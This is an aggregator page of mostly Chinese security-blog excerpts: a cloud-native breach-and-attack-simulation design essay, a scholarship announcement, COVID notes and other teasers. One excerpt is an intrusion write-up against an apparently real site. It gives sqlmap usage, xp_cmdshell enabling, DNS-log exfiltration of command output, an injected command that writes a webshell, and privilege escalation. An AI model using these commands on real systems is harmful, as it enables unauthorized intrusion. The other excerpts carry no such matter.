Aggregator

本篇介绍了中继攻击的原理和历史漏洞分析以及利用。

前几天有人说自己相隔 5 天感染了两种不同的新冠毒株。此人自称“北卡罗莱纳州立大学病毒学博士”。

本篇介绍了Kerberos 委派的发展史并引入了RBCD的花式利用。

简介
1.1 什么是BAS？
Breach and Attack Simulation（BAS）即入侵与攻击模拟，即通过对环境进行一致性、端到端、持续性、真实无害化的攻击模拟，以评估和验证环境的安全以及安全控制项的有效性，并且提供可视化的结果展示。
Gartner在2017年抛出了如何实际测试组织的整个安全性问题，随即引入了BAS技术。从BAS出现到在大众视野到逐步产品化的今天，关于BAS的讨论从未停止，如“实际测试”限定而引入测试的真实性讨论：到底应该有多真实、哪些应该是被模拟的等。在众多对此领域感兴趣或者相信BAS是解决该问题的有效方法的组织或个人的推动下，BAS的轮廓渐进明晰。
1.2 什么是云原生BAS？
Cloud Native Breach and Attack Simulation(CNBAS) 即云原生入侵与攻击模拟，顾名思义，这里是对测试环境镜像的限定，测试的对象是云原生环境。当然这里并不单单指集群环境。如图1所示，有利于构建、运行和充分利用云计算模型优势的技术/方法都是云原生相关。故CNBAS的测试应包含代码的安全开发、代码仓库、DevOps环境、镜像、镜像仓库等一系列上下游环节和对象。

图1 云原生概念发展图
经过前面的介绍，大家应该对CNBAS和传统BAS都有了些许了解，那么CNBAS存在的意义是什么？它是否能解决传统工具处理不了的问题？传统BAS能否替代CNBAS？带着诸多疑问，接下来我们继续探讨。
二为什么需要CNBAS
2.1 市场需要
随着全球数字化转型浪潮的推进，政企业务纷纷上云，上云的市场需求，必然推动云基础设施的持续发展，如图2所示，IDC2021年的报告显示，接受调查的云组织正在花费大量的费用去发展云基础设施。

图2 云基础设施的支出费用
这一数据也恰好和云原生市场应用的趋势相呼应，如图3所示，Datadog 2021年10月的报告数据显示在过去一年中，使用OpenShift的组织增加了28个百分点。作为云原生容器编排管理平台的一个企业版本，这表明不少的企事业组织正在将更多的应用迁移到云原生环境中。

图3 OpenShift市场使用趋势
云基础设施的完善和业务上云会带来诸多便利，但同时也使云上安全问题出现在大众视野。如图4所示，2021年Ermetic 和IDC的报告显示，超过90%的云使用者在过去的一年半时间里发生过云数据泄露的事件。当然这不仅局限于数据泄露，还有其他具有代表性的攻击事件：如2018年RedLock披露的特斯拉K8S挖矿事件、2019年Palo Alto Networks披露的Graboid蠕虫挖矿传播事件、2020年微软检测到大规模的K8S挖矿事件等。

图4 云攻击调度
云上业务被攻击后造成的损失是不可估量的，如图5所示，轻则缴纳赎金，重则数据泄露、业务中断，给组织造成经济和名誉上不可挽回的损失。

图5 云上业务和网站被攻击后的结果
面对如此严重的后果，云上业务拥有者，也会部署对应的安全产品，但即使部署大量的安全防护产品也不能完全打消管理者的疑虑，如何确保云原生环境的安全性和安全能力的有效性，能够早于攻击者发现环境的漏洞风险，这成为了市场迫切需要解决的问题。

图6 组织合作中对安全问题的态度的统计
2.2 传统的工具无法满足
如何测试云原生环境的安全性？如何测试安全能力控制项是否生效？绿盟君首先想到的是渗透测试、红蓝演练、漏洞评估。如图7所示，传统方案面临着成本高昂、连续性差、耗时长、覆盖面窄，无法保证一致性和可靠性等其中的一项或几项问题，而CNBAS恰好可以解决这些问题。

图7 云原生环境评估工具对比
那么，现有的传统BAS解决方案是否可以解决云原生场景下的这些问题呢？答案是否定的，虽然传统BAS具备上述所有特性，但传统BAS很少能够对云原生环境做到精细化和全面覆盖的攻击模拟。CNBAS专注于云原生场景下的攻击模拟，以集群安全为例，传统的BAS无论从外界资产进行发现和突破，还是部署各种形式的代理到集群内部，其攻击的方向和对象大多是粗略的（如以IP资产或者单独应用为维度的攻击），很少能够对内部的隔离控制项，或者微服务交互项、以及容器内部进行一致性的精细化攻击。
三CNBAS怎么做
Gartner在2017年的报告中对BAS做了相关的技术描述，即允许在组织环境中部署软件代理、虚拟机或通过其他形式持续并一致地对环境进行攻击模拟的工具。那么在云原生场景下，BAS怎么设计更加合适，毫无疑问，有一个永远不会错的回答——云化的方式。
3.1 攻击方式
什么是云化的方式？从Gartner对其的技术定义来看，向客户环境投放一个容器形式的代理无疑是最简单的实现方案，如图8所示，通过代理和Center进行交互达到对环境进行内部攻击模拟的目的。但绿盟君认为应该还有其它的答案，如无代理模式或许是云化场景下的一个友好方式。

图8 容器代理模式
3.2 上下游的联动
CNBAS应该具备和上下游应用或者工具进行联动的能力，以做到精细化控制环境和验证控制项目有效性。考虑到云原生环境和安全产品的多样性，插件化的联动方式或许是一个不错的选择。
3.3 用于攻击的武器
探讨这个问题的前提是模拟的对象是攻击，当然这里并没有排除对组织环境进行模拟，这需要按照场景去选择，这里暂时先探讨前者。
武器需要经过无害化的处理
至少产生的结果在可控的范围内，比如说在容器内逃逸后做了一个反弹shell，那么可以暂时反弹到内部固定的容器内或者其他可控且无法被其他程序利用的方式。
可以对武器进行原子化标记，便于根据场景或者机器学习对攻击链路进行编排
依托红蓝对抗等真实的攻击经验编排武器攻击链基线，以基线为中心进行组合学习，针对新链路进行标注，训练学习，最终以原子武器结合环境信息智能编排。值得一说的是机器学习的引入也许可以将原子武器进行变异，这是一个值得期待的方向。
武器攻击的过程需要可追溯、可回放
这里考虑的是攻击的可信度，如是否真实攻击成功、是否真实无害等，做到过程可溯源和可回放可以很好地减少这方面的疑虑。回放不用过多探讨，至于如何做到可追溯，日志和审计等常见方法是不错的选择。
3.4 部署方式
支持SaaS化的部署方式是必要的，但考虑到国内和国外的云使用场景和份额，行业部署或者单点部署也不得不加以考虑。

图9 CNBAS部署示意图
四CNBAS做什么
这里主要是想简单探讨功能模块的问题，这就涉及要做成傻瓜照相机还是机械单反的问题。结合市场和用户视角来看，绿盟君倾向于前者，以下的主要功能也是以此为前提进行的探讨。
4.1 对云原生环境资产的管理
CNBAS允许从不同的阶段进行攻击模拟，故掌握被攻击资产的关键信息是有必要的（如特定的账号或者口令，便于跳过发现和爆破进行内部攻击）。同时依托录入的信息可以和对应的资产进行交互，获取一定的信息便于资产的监控。
4.2 攻击任务
以整个云原生环境为目标进行攻击任务的管理，任务具有一致性、持续性、精确攻击范围、自动化等特性。
实施攻击中，可以对攻击输出进行实时查看跟踪，攻击结束后可以查看历史攻击链的日志，可以选择攻击链路进行回放攻击。
4.3 报表
以云原生环境为维度，统计完成攻击的任务，形成整体环境的报表，报表除了常规的漏洞统计、趋势、详情和可执行的修复建议外，多维度展示整个环境的安全成熟度是一个不错的补充。
4.4 上下游联动
攻击前的情报信息，以及攻击后的真实风险处置等等都可以联动上下游安全产品进行交互，如对于攻击成功后的风险，可以联动安全能力推送或者下发对应的策略消息，以此往复，形成端到端的闭环。
4.5 态势
除了已经提及的风险联动处置外，以整个云原生环境为维度进行统计，如对工具管理的环境进行风险汇聚形成分布和趋势等也是一个增色模块。

1 个帖子 - 1 位参与者

阅读完整话题

写在前面距离公众号的第一篇文章过去了2个月了，最近一直在忙上产品3.0的事情，中间加上感染新冠，这篇文章前后

https://github.com/leveryd-asm/asm实现了上周说的《基于任务编排玩一玩漏扫》

From Russian wipers and Chinese-backed APTs to supply chain attacks and critical vulnerabilities, here's what SentinelLabs researchers discovered in 2022.

The post サイバー攻撃と企業による防御の戦いの12か月｜SentinelOne Labs 2022年のレビュー appeared first on SentinelOne JP.

2022年安全架构总结以及2023安全方向展望。

前两周看到M01N Team公众号发布的《内存马的攻防博弈之旅之gRPC内存马》，文中介绍了gRPC内存马是如何注入进去并执行命令的，但是由于原文当中只给出靶场的Demo，并未给出利用注入的poc，便借助这篇文章再深入研究一下。

我最近几年阅读了很多新冠相关的资料，包括各种药物实验、各种临床指引等等，所以很早就注意到了辉瑞的 Paxlovid 这个药物，并一直关注该药在国内的使用情况。前几个月开始陆续有朋友问起 Paxlovid 的印度仿制药的问题。

婚礼不仅仅是一种传统且繁琐的风俗，更是一种盛大到磅礴的感动。

这几天我看到好几个同事说感染新冠几天后，虽然已经退烧，但嗓子疼的厉害。于是我告诉他们可以吃“退烧药”止痛。

VLab Team是墨云科技旗下的安全研究团队，专注于漏洞挖掘，红蓝对抗，APT攻防，前瞻性安全技术预研等方向。

2022 年度「戴夫寇爾全國資訊安全獎學金」頒獎餐敘已於 12 月 17 日順利落幕。

一路走來，無論是在我們的學習之路、創業過程中，我們都受到了來自各方的支持與協助，因此我們也希望回饋社會並培育資安人才，以獎學金的方式，協助學生建構正確資安意識及技能外，也能及早瞭解業界現況，降低產學落差。

「戴夫寇爾全國資訊安全獎學金」每年補助 10 名在資安領域研究成果傑出的大專院校學生，每名頒發 2 萬元獎金，希望使這些資安界的明日之星得以無後顧之憂，專注精進資安技術，未來成為獨當一面的資安人才。

此次獲獎同學遍佈全台，分別來自基隆商工資訊科、台灣師範大學資訊工程系、陽明交通大學資訊科學與工程研究所及資電亥客與安全學程、清華大學資訊安全研究所、逢甲大學資訊工程系、台中科技大學資訊管理系、南台科技⼤學資訊工程系等。獲獎同學皆將獲獎視為重要肯定，也表示希望持續精進自己，並將經驗分享給他人、回饋社會，其中也有好幾位同學希望未來能加入 DEVCORE。

「當時受到 DEVCORE 幫助，我說未來一定找機會好好感謝 DEVCORE。但 DEVCORE 回應『只要把這份感謝的心情，拿去幫助其他人，就是最好的回報』，因為這句話，我寫了一些文章，希望能幫助到其他人。在未來，我也會繼續幫助其他人，以此來回報貴公司在資安界無私的奉獻。」清大蘇同學說。

陽明交通大學高同學則表示，將運用這筆獎學金購買原本負擔不起的昂貴物聯網設備及相關工具，以利進行資安相關研究，也將購入資訊相關書籍，提升自己的知識。

期待獲獎同學們未來持續深耕資安知識與技術，在資安舞台上發光發熱！

记录一次实战稍曲折拿下目标站点的过程。

前期摸点

IIS7.0+ASP.NET的组合，简单尝试发现前台登录页面可能存在SQL注入，数据包如下：

为了节约时间直接祭出sqlmap，-r x.txt -v 3 --random-agent --dbms=mssql --batch

识别出了数据库，却被不明力量拦截了。

手工尝试绕过不明力量，堆叠的方式利用xp_cmdshell尝试将命令回显从dnslog中带出来：

先开xp_cmdshell：EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

利用dnslog带出回显：EXEC master..xp_cmdshell 'ping xxx.dnslog.cn -n 2'

一顿操作过后发现dnslog没反应，这里可能有几个原因，第一就是被不明力量拦截了，第二是目标不出网，第三可能我们语句构造有问题。是第一个原因的可能性比较大。

曲线救国

放弃注入后，还测试了其他漏洞，都以失败告终。但是目标是一个单位的子域而已，可以从单位的其他站点入手，进入内网后再尝试MS17010、pth等等手段来拿到目标机器权限即可。

于是在历经九九八十一难后，我们终于在目标所属B段中拿到一台机器权限，并使用代理成功进入内网。

遗憾的是拿到的机器是linux服务器，并且内网MS17010都已经打了补丁，fscan扫出来的结果基本无用。如果我们继续拿内网机器权限再利用hash传递攻击尝试的话，且不说密码是否通杀，就时间上也会浪费不少，于是陷入了小小的尴尬境地。

不过我们随即转念一想，大多数的不明力量都会部署在dmz或者在最外层交换机之上，而目前我们在内网中是不是不会受到不明力量影响？思路到此立即掏出sqlmap，再次-r x.txt -v 3 --random-agent --dbms=mssql --batch

果然如我们所想，成功注出来了，先看一下权限：

dba权限，直接os-shell，采用的是堆叠+延时的注入，一个whoami等了将近10分钟的时间，太慢了，还是手注吧。

从whoami的回显得知系统权限为低权限，加用户肯定是行不通了，站库没有分离，直接写个webshell。路径的话在报错的数据包就可以找到，值得注意的是，这里权限是普通用户权限，所以写webshell最好选择上传的目录或图片路径，本人尝试写入根路径浪费了一些时间。

上语句：
%';EXEC xp_cmdshell 'echo "xxx" > D:\xxx\xxx\xxx.aspx' -- -

成功getshell，最后用土豆提权收个尾，战斗结束。

1 个帖子 - 1 位参与者

阅读完整话题

如何打破产品战略规划的神秘感和主观色彩，让其有据可依，让大家都能理解？同时，在数字化转型之下，传统的产品研发管理模式是否还能适配，需要如何转型？这是本文所阐述的两方面重要内容。

Learn which vulnerabilities attackers preferred in November.

0x00 前言最近世界变化太大，在大浪潮的冲击下没有人可以幸免，对于我这代人从来没有这么近距离的观测过时代的

偶尔写篇随感